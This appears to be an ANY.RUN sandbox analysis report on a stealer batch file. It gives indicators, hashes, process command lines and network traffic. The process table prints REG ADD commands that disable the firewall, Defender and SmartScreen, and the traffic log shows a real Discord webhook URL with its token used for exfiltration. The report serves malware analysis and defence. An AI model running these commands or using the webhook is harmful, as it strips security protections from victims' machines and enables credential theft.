| File name: | SAB4.0.bat |
| Full analysis: | https://app.any.run/tasks/4ebb6b9b-2c7c-45e8-9906-b372f8be4044 |
| Verdict: | Malicious activity |
| Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
| Analysis date: | June 21, 2025, 08:51:50 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/x-msdos-batch |
| File info: | DOS batch file, ASCII text, with CRLF line terminators |
| MD5: | 32BB273113940C1D84BE90CDA0E6A3D0 |
| SHA1: | 3009978410653A103911317F958C8DA449EC0D9C |
| SHA256: | 9A1D88663E6E7BD4D5266A104E51A1F7E7B178A0B6A5227490D061CF6A480809 |
| SSDEEP: | 96:nQI8XV8wDIH5E8+aNbDqtXSEWHvEqJ0IEXvEgR:nQI0IHvnNbD+CEWHvxuDXcgR |
MALICIOUS
Disables task manager
- reg.exe (PID: 6504)
- reg.exe (PID: 2044)
Disables Windows firewall
- reg.exe (PID: 1712)
- reg.exe (PID: 2808)
- reg.exe (PID: 6980)
- reg.exe (PID: 724)
- reg.exe (PID: 1204)
- reg.exe (PID: 320)
Changes firewall settings
- reg.exe (PID: 1712)
- reg.exe (PID: 2808)
- reg.exe (PID: 6980)
- reg.exe (PID: 1204)
- reg.exe (PID: 320)
- reg.exe (PID: 724)
UAC/LUA settings modification
- reg.exe (PID: 2220)
- reg.exe (PID: 2296)
Disables Windows Defender
- reg.exe (PID: 728)
- reg.exe (PID: 640)
Uses NET.EXE to stop Windows Update service
- net.exe (PID: 2028)
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
- net.exe (PID: 1984)
Starts NET.EXE for service management
- cmd.exe (PID: 2136)
- net.exe (PID: 2028)
- cmd.exe (PID: 6704)
- net.exe (PID: 1984)
Create files in the Startup directory
- cmd.exe (PID: 2136)
Task Manager has been disabled (taskmgr)
- reg.exe (PID: 2044)
SUSPICIOUS
Executing commands from a ".bat" file
- powershell.exe (PID: 2716)
- powershell.exe (PID: 2216)
Starts process via Powershell
- powershell.exe (PID: 2716)
- powershell.exe (PID: 2216)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 6508)
- cmd.exe (PID: 2136)
- cmd.exe (PID: 1148)
- cmd.exe (PID: 6704)
Uses ICACLS.EXE to modify access control lists
- cmd.exe (PID: 6508)
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
- cmd.exe (PID: 1148)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 2716)
- powershell.exe (PID: 2216)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
The process connected to a server suspected of theft
- powershell.exe (PID: 6892)
- powershell.exe (PID: 3504)
Possible usage of Discord/Telegram API has been detected (YARA)
- cmd.exe (PID: 2136)
- powershell.exe (PID: 6892)
- cmd.exe (PID: 6704)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
Suspicious use of NETSH.EXE
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
Reads security settings of Internet Explorer
- ShellExperienceHost.exe (PID: 4520)
Windows service management via SC.EXE
- sc.exe (PID: 3800)
- sc.exe (PID: 5352)
Starts SC.EXE for service management
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
INFO
Disables trace logs
- powershell.exe (PID: 6892)
- netsh.exe (PID: 6104)
- powershell.exe (PID: 3504)
- netsh.exe (PID: 6336)
Checks proxy server information
- powershell.exe (PID: 6892)
- powershell.exe (PID: 3504)
- slui.exe (PID: 2144)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 6892)
- powershell.exe (PID: 3504)
Remote server returned an error (POWERSHELL)
- powershell.exe (PID: 6892)
- powershell.exe (PID: 3504)
Reads mouse settings
- reg.exe (PID: 6776)
- reg.exe (PID: 3748)
Reads the computer name
- ShellExperienceHost.exe (PID: 4520)
Checks supported languages
- ShellExperienceHost.exe (PID: 4520)
Manual execution by a user
- rundll32.exe (PID: 2632)
- rundll32.exe (PID: 5284)
- rundll32.exe (PID: 868)
- rundll32.exe (PID: 5712)
- cmd.exe (PID: 1148)
- rundll32.exe (PID: 3108)
- rundll32.exe (PID: 6380)
- rundll32.exe (PID: 2348)
- rundll32.exe (PID: 320)
- rundll32.exe (PID: 7100)
- rundll32.exe (PID: 3880)
- rundll32.exe (PID: 6264)
- rundll32.exe (PID: 1508)
- rundll32.exe (PID: 2612)
- rundll32.exe (PID: 1712)
Launching a file from the Startup directory
- cmd.exe (PID: 2136)
Reads security settings of Internet Explorer
- rundll32.exe (PID: 2632)
- rundll32.exe (PID: 2348)
Reads Microsoft Office registry keys
- rundll32.exe (PID: 2632)
- rundll32.exe (PID: 2348)
Reads the software policy settings
- slui.exe (PID: 2144)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
ims-api
(PID) Process(2136) cmd.exe
Discord-Webhook-Tokens (1)1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
(PID) Process(6892) powershell.exe
Discord-Webhook-Tokens (1)1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Webhook-Tokens (2)1385864776902774865/nxfnzjtjnf0afmrmbf63cbitfigk1xqallpolnp5qabgkvfs4h48tjsrlb-xoxugyla1
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/nxfnzjtjnf0afmrmbf63cbitfigk1xqallpolnp5qabgkvfs4h48tjsrlb-xoxugyla1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/nxfnzjtjnf0afmrmbf63cbitfigk1xqallpolnp5qabgkvfs4h48tjsrlb-xoxugyla1
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
(PID) Process(6704) cmd.exe
Discord-Webhook-Tokens (1)1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Total processes
196
Monitored processes
60
Malicious processes
15
Suspicious processes
4
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 320 | REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 320 | "C:\WINDOWS\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Downloads\VARIETY_WOLFED_VARIETY_WOLFED_addedlearning.png | C:\Windows\System32\rundll32.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 640 | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 724 | REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 728 | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 868 | "C:\WINDOWS\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Downloads\VARIETY_WOLFED_tryingmusic.jpg | C:\Windows\System32\rundll32.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1056 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1148 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyAutoStart.bat"" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1164 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1204 | REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
41 037
Read events
40 979
Write events
58
Delete events
0
Modification events
| (PID) Process: | (2716) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.FriendlyAppName |
Value: Windows Command Processor | |||
| (PID) Process: | (2716) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.ApplicationCompany |
Value: Microsoft Corporation | |||
| (PID) Process: | (6504) reg.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | DisableTaskMgr |
Value: 1 | |||
| (PID) Process: | (6776) reg.exe | Key: | HKEY_CURRENT_USER\Control Panel\Mouse |
| Operation: | write | Name: | SwapMouseButtons |
Value: 1 | |||
| (PID) Process: | (1564) reg.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer |
| Operation: | write | Name: | NoDesktop |
Value: 1 | |||
| (PID) Process: | (1164) reg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
| Operation: | write | Name: | SmartScreenEnabled |
Value: Off | |||
| (PID) Process: | (6980) reg.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile |
| Operation: | write | Name: | EnableFirewall |
Value: 0 | |||
| (PID) Process: | (1712) reg.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile |
| Operation: | write | Name: | EnableFirewall |
Value: 0 | |||
| (PID) Process: | (2808) reg.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile |
| Operation: | write | Name: | EnableFirewall |
Value: 0 | |||
| (PID) Process: | (728) reg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | write | Name: | DisableAntiSpyware |
Value: 1 | |||
Executable files
0
Suspicious files
1
Text files
23
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2716 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_24czphjg.n3n.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2716 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mzdejxms.ppx.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6892 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ksunymu.vw2.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2716 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:2D1849C5DCB636710D94D79FBD8F35B7 | SHA256:60FD6CEE3DC1D98F2F116A910EF50D25A298B2A16CADCD697968C584A6EAB356 | |||
| 6892 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dvcsdpzx.a2r.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2136 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_addedlearning.png | image | |
MD5:D8D25F42FC9C4644D032992A897DA5BF | SHA256:C43BEF99CD6F828116A142CD4396CA9E3CD263EE5904E6E1F0ECFF9018A6ADC0 | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_idyrngma.w4o.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2136 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_aroundthe.png | image | |
MD5:768D1A1B2DF92420B42DF547BF584CC2 | SHA256:9E4CF36BD8345A26A099B988D0392141F0881F11BBF1D1C0A1E8DCC782DD4051 | |||
| 2136 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_fatformat.png | image | |
MD5:D4C4B4BA90C99A51B3CA99F721ED29C5 | SHA256:DB4B349C3A8C77D581C0DDA0535B4AFF16DA068884BF50DB78EB3303770D8FE1 | |||
| 2136 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_useeuropean.jpg | image | |
MD5:6037EA0ACE2EFE9AA7E030889CA9A87C | SHA256:79215C8C930C6C4DFCE239FAA20B8B7BC7666C63608C6966A62422EF14118DAA | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
21
DNS requests
8
Threats
10
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2764 | RUXIMICS.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | POST | — | 162.159.128.233:443 | https://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1 | unknown | — | — | whitelisted |
2764 | RUXIMICS.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | POST | — | 162.159.128.233:443 | https://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1 | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
1268 | svchost.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2764 | RUXIMICS.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
1268 | svchost.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
2764 | RUXIMICS.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
discord.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
2200 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
2200 | svchost.exe | Misc activity | ET INFO Discord Chat Service Domain in DNS Lookup (discord .com) |
6892 | powershell.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
6892 | powershell.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
6892 | powershell.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |
3504 | powershell.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
3504 | powershell.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
3504 | powershell.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |